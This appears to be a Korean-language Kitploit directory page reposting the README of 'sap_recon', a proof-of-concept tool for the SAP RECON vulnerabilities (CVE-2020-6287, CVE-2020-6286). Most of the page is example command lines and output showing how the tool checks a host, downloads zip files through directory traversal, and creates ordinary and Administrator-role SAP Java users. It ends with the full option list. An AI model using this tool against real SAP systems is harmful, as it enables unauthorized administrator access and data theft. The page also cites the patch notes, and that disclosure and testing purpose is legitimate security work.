Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SAP_RECON — CVE-2020-6287, CVE-2020-6286(SAP RECON 취약점)용 PoC | Kitploit
도구/GitHubGitHub/chipik/sap_recon
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubchipik/sap_recon

SAP_RECON

CVE-2020-6287, CVE-2020-6286(SAP RECON 취약점)용 PoC

저장소 보기
2236325년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-6287, CVE-2020-6286 (SAP RECON 취약점)에 대한 PoC

Pffff! RECON(Remotely Exploitable Code On NetWeaver)이라고? 정말? 그게 최고의 코드네임이었어? :)

이 스크립트는 SAP LM Configuration Wizard의 인가 확인 누락 취약점을 확인하고, PoC 스크립트로서 queryProtocol 메소드의 디렉토리 트래버설을 악용합니다.

디렉토리 트래버설을 통해 SAP 서버에서 모든 zip 파일을 다운로드할 수 있습니다.

이 프로젝트는 교육 목적으로만 제작되었으며, 법 위반이나 개인적 이익을 위해 사용될 수 없습니다.
이 프로젝트의 저자는 이 프로젝트 자료로 인해 발생할 수 있는 어떠한 피해에 대해서도 책임을 지지 않습니다

최초 발견:

CVE-2020-6287: Pablo Artuso
CVE-2020-6286: Yvan 'iggy' G.

해결책: #2934135, #2939665

사용 방법

SAP NW AS Java 호스트명/IP를 지정하기만 하면 됩니다.

추가 옵션은 다음과 같습니다:

  1. -c - SAP 서버가 RECON에 취약한지 확인
  2. -f - SAP 서버에서 zip 파일 다운로드
  3. -u - Authenticated User 역할을 가진 SAP JAVA 사용자 생성
  4. -a - 역할을 가진 SAP JAVA 사용자 생성
도구 다운로드
Administrator

예: zip 파일 다운로드

root@kitploit:~
~python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved

예: SAP JAVA 사용자 생성

root@kitploit:~
~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created

예: SAP JAVA 관리자 사용자 생성

root@kitploit:~
~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created

모든 옵션

root@kitploit:~
~python RECON.py -h
usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
                [-u] [-a] [--timeout TIMEOUT] [-v]

PoC for CVE-2020-6287,  (RECON)
This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and exploits dir traversal in queryProtocol method
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy

Thanks:
- Spencer McIntyre https://twitter.com/zeroSteiner

Solution: https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  Java NW host (default: 127.0.0.1)
  -P PORT, --port PORT  Java NW web port (default: tcp/50000)
  -p PROXY, --proxy PROXY
                        Use proxy (ex: 127.0.0.1:8080)
  -s, --ssl             enable SSL
  -c, --check           just detect vulnerability
  -f ZIPFILE, --zipfile ZIPFILE
                        ZIP file to read. CVE-2020-6286
  -u, --user            Create simple JAVA user. CVE-2020-6287
  -a, --admin           Create JAVA user with role "Administrator". CVE-2020-6287
  --timeout TIMEOUT     HTTP connection timeout in second (default: 10)
  -v, --verbose         verbose mode